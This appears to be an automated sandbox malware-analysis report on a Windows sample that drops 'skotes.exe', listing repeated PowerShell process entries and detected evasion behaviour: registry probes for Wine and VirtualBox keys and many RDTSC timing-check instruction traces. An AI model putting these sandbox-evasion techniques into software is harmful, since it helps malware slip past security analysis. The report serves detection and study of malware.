Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F6309 second address: 4F6325 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128F07h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F6325 second address: 4F632B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F632B second address: 4F6333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FC1E2 second address: 4FC1E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FC339 second address: 4FC386 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F075D128EFBh 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007F075D128EFAh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F075D128F05h 0x0000001b jmp 00007F075D128F07h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FC386 second address: 4FC393 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F075CBABEC6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FC54D second address: 4FC551 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FC551 second address: 4FC57D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F075CBABED7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c jl 00007F075CBABEDCh 0x00000012 jo 00007F075CBABECCh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FC82C second address: 4FC83B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FC83B second address: 4FC850 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABECFh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FC850 second address: 4FC862 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F075D128F02h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FC862 second address: 4FC86C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F075CBABEC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FCB12 second address: 4FCB18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FCB18 second address: 4FCB24 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F075CBABEC6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FCB24 second address: 4FCB2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF549 second address: 4FF5F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F075CBABECEh 0x0000000b popad 0x0000000c xor dword ptr [esp], 2B447AA4h 0x00000013 mov esi, edi 0x00000015 jmp 00007F075CBABED3h 0x0000001a push 00000003h 0x0000001c mov dword ptr [ebp+122D2980h], esi 0x00000022 push 00000000h 0x00000024 mov dword ptr [ebp+122D2970h], eax 0x0000002a push 00000003h 0x0000002c mov dword ptr [ebp+122D1929h], ebx 0x00000032 push B39EE98Bh 0x00000037 push eax 0x00000038 pushad 0x00000039 jmp 00007F075CBABECFh 0x0000003e pushad 0x0000003f popad 0x00000040 popad 0x00000041 pop eax 0x00000042 xor dword ptr [esp], 739EE98Bh 0x00000049 and esi, 0F9EBAB5h 0x0000004f lea ebx, dword ptr [ebp+124543D9h] 0x00000055 push 00000000h 0x00000057 push eax 0x00000058 call 00007F075CBABEC8h 0x0000005d pop eax 0x0000005e mov dword ptr [esp+04h], eax 0x00000062 add dword ptr [esp+04h], 0000001Dh 0x0000006a inc eax 0x0000006b push eax 0x0000006c ret 0x0000006d pop eax 0x0000006e ret 0x0000006f mov ecx, eax 0x00000071 xor ecx, dword ptr [ebp+122D1B3Eh] 0x00000077 push eax 0x00000078 pushad 0x00000079 push eax 0x0000007a push edx 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF5F2 second address: 4FF5F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF68F second address: 4FF694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF694 second address: 4FF6E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F075D128F09h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F075D128F02h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push edi 0x00000016 jbe 00007F075D128EF8h 0x0000001c push edi 0x0000001d pop edi 0x0000001e pop edi 0x0000001f mov eax, dword ptr [eax] 0x00000021 jp 00007F075D128F04h 0x00000027 push eax 0x00000028 push edx 0x00000029 jne 00007F075D128EF6h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF6E4 second address: 4FF6FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F075CBABECFh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF6FF second address: 4FF748 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp+122D374Eh] 0x0000000f push 00000003h 0x00000011 add dword ptr [ebp+122D18EBh], esi 0x00000017 jmp 00007F075D128F07h 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+122D1929h], edi 0x00000024 push 00000003h 0x00000026 add edx, dword ptr [ebp+122D374Ah] 0x0000002c push 49D5F48Fh 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push edi 0x00000036 pop edi 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF748 second address: 4FF74E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF74E second address: 4FF753 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF753 second address: 4FF759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF759 second address: 4FF7AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 762A0B71h 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F075D128EF8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 or cx, C8A2h 0x0000002d lea ebx, dword ptr [ebp+124543E2h] 0x00000033 jmp 00007F075D128EFDh 0x00000038 push eax 0x00000039 pushad 0x0000003a je 00007F075D128EFCh 0x00000040 jp 00007F075D128EF6h 0x00000046 pushad 0x00000047 pushad 0x00000048 popad 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF7F2 second address: 4FF7F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF7F6 second address: 4FF84D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F075D128EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov si, 6152h 0x00000012 push 00000000h 0x00000014 mov dword ptr [ebp+122D31DCh], edx 0x0000001a call 00007F075D128EF9h 0x0000001f push esi 0x00000020 jmp 00007F075D128F01h 0x00000025 pop esi 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jne 00007F075D128F0Eh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF84D second address: 4FF853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF853 second address: 4FF857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF857 second address: 4FF894 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F075CBABED5h 0x00000015 popad 0x00000016 pop edx 0x00000017 mov eax, dword ptr [eax] 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F075CBABED1h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF894 second address: 4FF8A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF8A3 second address: 4FF8C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F075CBABED7h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF8C3 second address: 4FF976 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F075D128EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pop eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F075D128EF8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push 00000003h 0x00000028 mov edx, 07CD0769h 0x0000002d mov dh, 2Bh 0x0000002f push 00000000h 0x00000031 xor edi, dword ptr [ebp+122D3916h] 0x00000037 push 00000003h 0x00000039 or dword ptr [ebp+122D1929h], edx 0x0000003f jp 00007F075D128EFCh 0x00000045 call 00007F075D128EF9h 0x0000004a jg 00007F075D128F00h 0x00000050 push eax 0x00000051 jmp 00007F075D128F04h 0x00000056 mov eax, dword ptr [esp+04h] 0x0000005a push esi 0x0000005b jmp 00007F075D128EFBh 0x00000060 pop esi 0x00000061 mov eax, dword ptr [eax] 0x00000063 jmp 00007F075D128F07h 0x00000068 mov dword ptr [esp+04h], eax 0x0000006c push ecx 0x0000006d push ecx 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 520933 second address: 520938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 520938 second address: 520942 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F075D128EF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 520942 second address: 520946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EA531 second address: 4EA544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F075D128EFEh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EA544 second address: 4EA54B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E921 second address: 51E931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F075D128EF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E931 second address: 51E935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E935 second address: 51E951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F075D128EFBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F075D128EF6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E951 second address: 51E955 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E955 second address: 51E966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F075D128EFBh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E966 second address: 51E96D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51EAAA second address: 51EAC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F075D128F01h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51EAC2 second address: 51EACE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F075CBABEC6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51EACE second address: 51EADE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F075D128EFAh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51EADE second address: 51EAE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F1A7 second address: 51F1B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F075D128EF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F1B1 second address: 51F1D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F075CBABECDh 0x0000000d jmp 00007F075CBABED3h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F1D9 second address: 51F1EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFBh 0x00000007 jnc 00007F075D128EF6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F1EE second address: 51F214 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F075CBABECBh 0x0000000a pop esi 0x0000000b jbe 00007F075CBABECAh 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 jl 00007F075CBABED2h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F214 second address: 51F21A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F505 second address: 51F50C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F50C second address: 51F528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jmp 00007F075D128F00h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
